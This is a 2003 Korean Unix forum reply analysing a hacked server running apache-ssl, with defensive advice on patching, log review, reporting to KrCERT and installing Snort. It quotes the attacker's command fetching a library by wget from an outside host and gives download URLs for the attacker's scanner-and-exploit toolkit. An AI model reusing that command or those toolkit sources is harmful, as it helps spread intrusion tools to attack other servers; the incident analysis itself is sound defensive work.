| [ CnUnix ] in KIDS 글 쓴 이(By): ymir (Mizz) 날 짜 (Date): 2003년 8월 12일 화요일 오전 09시 00분 28초 제 목(Title): Re: 이거 해킹 분석줌 부탁해여.. 리눅스 박스가 없어서 제대로 테스트는 못 해봤지만.. schoolhelp.go.ro/likethis.tgz 위 서버의 likethis.tgz 라는 파일에는... 특정 클래스의 IP 대역의 포트를 스캔할 수 있는 포트스캐너와.. apache-ssl 의 443 포트를 검색해서 취약성 여부를 체크 할 수 있는 도구.. 직접 exploit 할 수 있는 바이너리가 들어 있습니다.. 아마도 뱁스님 서버에도 이 취약성을 이용해서 들어 오지 않았나 생각됩니다. -> apache-ssl 을 사용하신다면 최신으로 업그레이드 & 패치 요망 wget www.musketaro.go.ro/libcrypto.so.1 위 바이너리를 실행해서 다른 서버를 해킹하기 위해.. 위의 라이브러리 파일을 가져온 것으로 짐작됩니다.. 뒤의 xxx.ac.kr 이나 61.204.25.252 의 IP 는.. 위 도구를 이용하여 포트 스캔을 한 후에... 해킹 여부 또는 서버 정보를 얻기 위해 접속을 시도해 본 것이 아닐까 생각됩니다.. (어디까지나 짐작입니다. 으음, 설마 자기 서버로 왔다 갔다 할 바보는 없겠지요?) likethis.tgz 를 풀면 apache 라는 서브 디렉토리가 생성되는데... ip (또는 ip2) 등의 이름으로 Vulnerable 한 IP 리스트가 있습니다.. 만약 해커로 추정되는 녀석이 작업한 디렉토리가 남아 있다면.. 해당 파일을 확인하셔서... 엔트리에 있는지 보시면 될 것 같습니다.. (물론 다른 클래스의 IP 를 스캔하면 지워지고 없을 수도 있습니다.) -> 좀 더 자세한 내용을 알고 싶으시면 www.certcc.or.kr 침해사고 대응팀 같은데에 연락하셔도 좋을 것 같습니다. 접속 기록이 남아 있는 서버의 관리자에게 메일을 보내 우리 서버가 이러이러한 경로로 해킹을 당했고 그 쪽 서버의 접속 기록이 남아 있으니까 서버 점검을 하길 바란다는 내용의 메일만 보내주셔도 괜찮을 것 같습니다. 사고가 난 후의 로그는 그다지 믿을 만한게 못되지만... 혹시 좀 더 조사해 보시고 싶으시다면... 일단 웹로그나 SSL 로그가 남아 있다면 로그를 확인해 보시구요.. /var/log/messages 파일에서도 역시 버퍼 오버플로우 흔적 같은게 남아 있는지 확인해 보세요.. 리눅스만 있었어도 테스트는 해 볼 수 있을 것 같은데... 단지 위 자료만 가지고는 짐작밖에 할 수 없네요... ;;; 아시다시피... ^^;; 일단 해킹 당한 서버는 뭐든 믿지 마시고... 그냥 새 버전으로 깔끔하게 다시 까는게 젤 좋구요... 그게 어려우시다면... 일단 apache-ssl 을 업그레이드 또는 패치를 하시구요... snort 같은 IDS 같은 거라도 깔아 놓으시고... 특정 포트 (21, 22, 23, 25, 53, 80, 443, ..) 등만 모니터링 하게 하셔도... 그나마 사고를 조금이라도 빨리 알아 낼 수 있는 가능성이 있습니다.. (웹서버라면... iptables 같은 서버 방화벽은 무리겠죠... ^^??) 그럼 여긔까지... ^^ Oh, I do believe everlasting love and destiny to meet you again I feel a pain I can hardly stand all I can do is loving you - *Mizz* the Magic Knight! |